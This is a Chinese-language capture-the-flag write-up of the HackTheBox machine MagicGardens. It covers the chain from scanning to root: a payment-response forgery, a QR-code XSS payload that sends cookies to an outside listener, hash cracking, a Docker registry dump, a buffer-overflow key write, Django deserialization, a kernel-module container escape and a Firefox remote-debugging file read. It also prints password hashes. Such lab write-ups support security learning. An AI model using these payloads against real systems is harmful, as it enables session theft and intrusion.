基本信息
data:image/s3,"s3://crabby-images/79c5a/79c5a644166980a70ce2f9fd50a3d315abc3f3cf" alt=""
端口扫描
22,80,5000:
1 | nmap -sC -sV 10.10.11.9 |
80
需要加hosts:
1 | 10.10.11.9 magicgardens.htb |
一个在线商城:
data:image/s3,"s3://crabby-images/d7dd8/d7dd8b7096abc400afc8aaea1115fa7e7b4f30a6" alt=""
目录扫描
目录扫描可以看到admin之类的:
1 | gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://magicgardens.htb/ |
Magic Gardens
随意注册登录,发现一个Subscription功能:
data:image/s3,"s3://crabby-images/a0f6a/a0f6abce3898779ce9d151315ac1577b716e4d3f" alt=""
正常测试请求包中得到银行域名honestbank.htb,同样加到hosts:
data:image/s3,"s3://crabby-images/cf816/cf8163686e78053fe914fbb2d86219a531b8cd81" alt=""
并且我们可以修改这里的bank地址,根据请求信息,我们应该需要伪造对应的响应来获取高级订阅:
data:image/s3,"s3://crabby-images/b1b97/b1b97c4e49913201f44626004863c154a53daf29" alt=""
payment
根据订阅时的请求数据直接构造对payment的请求,获取响应是402:
data:image/s3,"s3://crabby-images/c46ce/c46ce67f12d1157af5e0d22ec35429fac417ca1c" alt=""
尝试自己构造server返回虚假的200响应,订阅时拦截替换银行地址,成功获取了高级订阅:
data:image/s3,"s3://crabby-images/f86de/f86de17825435c9155f0af305cf92a1b38b9b1e6" alt=""
data:image/s3,"s3://crabby-images/9cc77/9cc77bb58ca041f46c239f9fcf8f1f2dfa8e936b" alt=""
qrcode
预期路径后面打XSS会用到这个:
1 | http://magicgardens.htb/qr_code/images/serve-qr-code-image/?text=MTA1OGE0MmE4MWU1MjUyYzc2Y2IzMDhiY2Q2YTAyMTQuMGQzNDFiY2RjNjc0NmYxZDQ1MmIzZjRkZTMyMzU3Yjk%3D&cache_enabled=1&image_format=png&boost_error=1&encoding=utf-8&token=m.4..png.m.hRr1VC7DBMZLIdpg8rn2%3AnU3uw5StniCRNbPxPOKQOIv6rlvSp-blkH0tCYN4v5E |
messages
发送message功能需要目标用户存在,自己注册两个号测试即可,存在上传附件功能,发送后另一个用户查看,可以确认文件路径格式:
1 | /media/53ed67ce72148b6387c5d57cfa53c04d/b1aaa238a3bf9a19295face48bd5c607 |
usernames
(这部分属于非预期路径)
当用户名目录存在时,直接访问目录提示403,不存在时404,所以可以忽略文件名,来爆破存在的用户名:
1 | John |
data:image/s3,"s3://crabby-images/776e1/776e161072d68a0fe3b78bf750a7da57f8fe4f0c" alt=""
另外注册时后也会有提示用户名已经存在,可以用来爆破已存在的用户:
1 | alex |
data:image/s3,"s3://crabby-images/4eacc/4eacc99b7464d81680301ef5a28fcc951f15fe75" alt=""
purchase
测试购买,提示出示二维码享受折扣:
data:image/s3,"s3://crabby-images/30890/30890b1f06e359e1f01e333d9c1e3fd74dd66ca3" alt=""
消息中也有来自morty的信息,要求我们发给他二维码:
data:image/s3,"s3://crabby-images/8cc81/8cc814fbaf53acd4e7f129d0224dffd3fb7bd2b5" alt=""
server.py
1 | from http.server import BaseHTTPRequestHandler, HTTPServer |
XSS
这里需要一点合理推测,他要求我们发送二维码,二维码中信息就是那个代码,会自动显示在他那里,打XSS,所以我们需要用xss payload生成二维码发给他
1 | 1058a42a81e5252c76cb308bcd6a0214.0d341bcdc6746f1d452b3f4de32357b9.</p><script>var i=new Image(); i.src="http://10.10.14.7:7777/?cookie="+btoa(document.cookie);</script><p> |
data:image/s3,"s3://crabby-images/caed2/caed29f563f3d8a096870f7e269fd0a85279e1ab" alt=""
Diango admin
然后替换cookie,成为morty,可以访问admin:
data:image/s3,"s3://crabby-images/226ce/226cef13e3168d431124e850479b29f494fa2404" alt=""
data:image/s3,"s3://crabby-images/09648/09648b38e2c0330b86b013c4155ef2bdbd05e01c" alt=""
morty
然后在change password->stores users中可以得到morty的hash,和非预期部分一样,破解出morty密码后ssh登录:
1 | pbkdf2_sha256$600000$y7K056G3KxbaRc40ioQE8j$e7bq8dE/U+yIiZ8isA0Dc0wuL0gYI3GjmmdzNU+Nl7I= |
data:image/s3,"s3://crabby-images/c5398/c53988675d737fa7dbc16299a482dddef99a93c4" alt=""
Docker Registry
(这部分属于非预期路径,但预期路径得到alex后也会回到这里dump)
使用得到的用户名可以爆破5000端口的docker registry:
1 | alex diamonds |
data:image/s3,"s3://crabby-images/c0d97/c0d97257674af2b95856f85777c07efcbbcbda4d" alt=""
dump
alex可以访问docker registry,常规dump:
- Syzik/DockerRegistryGrabber: Enumerate / Dump Docker Registry
https://github.com/Syzik/DockerRegistryGrabber
1 | python3 DockerGraber.py https://10.10.11.9 -U alex -P diamonds --list |
data:image/s3,"s3://crabby-images/092fe/092fe797ec0241f7862f8ba4d68daeab7858f99e" alt=""
morty
其中480311b89e2d843d87e76ea44ffbb212643ba89c1e147f0d0ff800b5fe8964fb.tar.gz
可以得到一个sqlite文件,其中得到morty的hash:
1 | 2|pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=|2023-06-06 17:34:56.520750|1|morty|||1|1|2023-06-06 17:32:24| |
data:image/s3,"s3://crabby-images/fd3b0/fd3b0ce890d0113bef8f78b2d3adba1a5a9207d2" alt=""
data:image/s3,"s3://crabby-images/22d27/22d27e5c1e23366100ea2b72fd8cc810ceb179f7" alt=""
然后可以破解出morty密码:
1 | sudo hashcat -m 10000 hash.txt ~/Tools/dict/rockyou.txt |
morty
得到的密码也是morty的ssh密码,但还没到user:
data:image/s3,"s3://crabby-images/5e31d/5e31d66965e54bdbaab9d6cc3940c68f086534b0" alt=""
harvest
查看进程可以看到alex用户运行的harvest:
data:image/s3,"s3://crabby-images/2cf64/2cf646fcbe144a467407fa8fc395ce63807a822b" alt=""
harvest
下载到本地分析:
1 | morty@magicgardens:~$ which harvest |
基础跟踪发现handle_raw_packets会接受输入,满足条件会写日志,这里注意是 raw_packet,那里实际判断的是ipv4和ipv6,而不是字符,就是对于ipv4数据只是输出到客户端终端,ipv6会进入日志
data:image/s3,"s3://crabby-images/0df50/0df5044aa8eef2e80638552f6138710961bc8e21" alt=""
data:image/s3,"s3://crabby-images/629dc/629dc48eb778319d57e707990de89a3dc29c712f" alt=""
data:image/s3,"s3://crabby-images/53f33/53f33b21a46ed324db12e4f3de2041e57c4f9e3c" alt=""
bof
本地运行测试:
1 | sudo strace ./harvest server -l log_packet.log |
emmm,本地kali里测试运行和宿主机交互流量干扰太严重,跳过了,但整个流程也不难,自己调吧
就是利用bof可以控制日志路径和写入内容,从而写公钥:
1 | 直接morty shell里运行client |
client.py
1 | import socket |
exp.py
1 | import socket |
user flag
bof写公钥后ssh连接:
data:image/s3,"s3://crabby-images/87000/87000d5e755e96b6c1a1a8e94dd37246201604f9" alt=""
信息
然后alex登录的时候提示有邮件,查看邮件发现一个和密码相关的邮件:
data:image/s3,"s3://crabby-images/3c0d4/3c0d4958e288dc8a7181d9704e8ff6c4af3b58d8" alt=""
提取出zip,解压需要密码,破解:
1 | zip2john auth.zip |
然后使用得到的密码解压,里面是htpasswd文件,再次破解:
1 | alex:$2y$05$xZTYUkg.1Ohcrf31e3whieWMBhSinB/N0fznRJSqHr4KDQIuQ0txW |
邮件中也提到registry密码相同,就是5000端口那里的docker registry
docker registry
然后就和前面的registry部分一样了,dump,只是预期是从env获取app.settings和secret key:
1 | 480311b89e2d843d87e76ea44ffbb212643ba89c1e147f0d0ff800b5fe8964fb.tar.gz |
反序列化
拿到secret key后就可以生成任意cookie来打反序列化:
- PlaidCTF 2014: ReeKeeeee | System Overlord
https://systemoverlord.com/2014/04/14/plaidctf-2014-reekeeeee/
1 | $ python3 exp.py |
然后替换cookie中的sessionid,刷新,触发反序列化
data:image/s3,"s3://crabby-images/7d291/7d291325cbd6d89ed352c3458b0a152dc4245a6f" alt=""
这样打到的是容器内root:
data:image/s3,"s3://crabby-images/8eaad/8eaade210537703d7c6eb31aa690da03597f9f70" alt=""
exp.py
1 | import os |
Docker Escape & root flag
容器有cap_sys_module权限,参考:
- Linux Capabilities | HackTricks | HackTricks
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_sys_module
data:image/s3,"s3://crabby-images/63a00/63a00802c7838ab07c96fa1a7851a38ce5a27b35" alt=""
就按照里面的步骤,make后insmod,得到宿主机root:
1 | make |
data:image/s3,"s3://crabby-images/35cbd/35cbdecd925ece42164fde9d24ed350408cea3b9" alt=""
data:image/s3,"s3://crabby-images/195b6/195b6b166af3cbf9b097a1fc012089d0631212e7" alt=""
reverse-shell.c
1 |
|
Makefile
1 | obj-m +=reverse-shell.o |
非预期 root
firefox以root权限开着remote debug:
data:image/s3,"s3://crabby-images/11a43/11a43bc63a67defef500bc68d9574e2a4fb12bfe" alt=""
- Debugging — Firefox Source Docs documentation
https://firefox-source-docs.mozilla.org/remote/Debugging.html - Usage — Firefox Source Docs documentation
https://firefox-source-docs.mozilla.org/remote/cdp/Usage.html - Remotely debugging Firefox instances · Embrace The Red
https://embracethered.com/blog/posts/2020/cookies-on-firefox/
然后去对应profile目录查看,获取调试地址:
1 | morty@magicgardens:/tmp/rust_mozprofilemf92Rc$ cat DevToolsActivePort |
转发端口,本地连接,打开新页面然后打印成pdf:
- vi/websocat: Command-line client for WebSockets, like netcat (or curl) for ws:// with advanced socat-like functions
https://github.com/vi/websocat
1 | {"id": 1, "method": "Target.createTarget", "params": {"url": "file:///root/.ssh/id_rsa"}} |
data:image/s3,"s3://crabby-images/2b22d/2b22d0e63cb0bea6632888f5bedc6544c14bc991" alt=""
data:image/s3,"s3://crabby-images/863bd/863bd95e1c359b08a12437cb7c0fbfcd85113e8b" alt=""
data:image/s3,"s3://crabby-images/1c589/1c589d551aec97f36806f5da00954f26923bef54" alt=""
这个现在也有新的自动工具了:
- offensive-security-pwncat/CDPwn: CDPwn is a python script designed to capture screenshots of files via the Chrome DevTools Protocol (CDP), a technique useful for privilege escalation when the CDP service runs with root permissions.
https://github.com/offensive-security-pwncat/CDPwn
flags
然后使用得到的私钥登录:
data:image/s3,"s3://crabby-images/9567d/9567d6653f8c78ae9644429360177733df62f7a0" alt=""
shadow
1 | root:$y$j9T$Gctu2C9XwCFVr1qINWJjA/$u8IdKz0x2uCYAzOIx0qxNvBQEjY0uOaRwgA1sRC8Aj8:19592:0:99999:7::: |
参考资料
- Syzik/DockerRegistryGrabber: Enumerate / Dump Docker Registry
https://github.com/Syzik/DockerRegistryGrabber - Debugging — Firefox Source Docs documentation
https://firefox-source-docs.mozilla.org/remote/Debugging.html - Usage — Firefox Source Docs documentation
https://firefox-source-docs.mozilla.org/remote/cdp/Usage.html - Remotely debugging Firefox instances · Embrace The Red
https://embracethered.com/blog/posts/2020/cookies-on-firefox/ - vi/websocat: Command-line client for WebSockets, like netcat (or curl) for ws:// with advanced socat-like functions
https://github.com/vi/websocat - PlaidCTF 2014: ReeKeeeee | System Overlord
https://systemoverlord.com/2014/04/14/plaidctf-2014-reekeeeee/ - Linux Capabilities | HackTricks | HackTricks
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_sys_module - offensive-security-pwncat/CDPwn: CDPwn is a python script designed to capture screenshots of files via the Chrome DevTools Protocol (CDP), a technique useful for privilege escalation when the CDP service runs with root permissions.
https://github.com/offensive-security-pwncat/CDPwn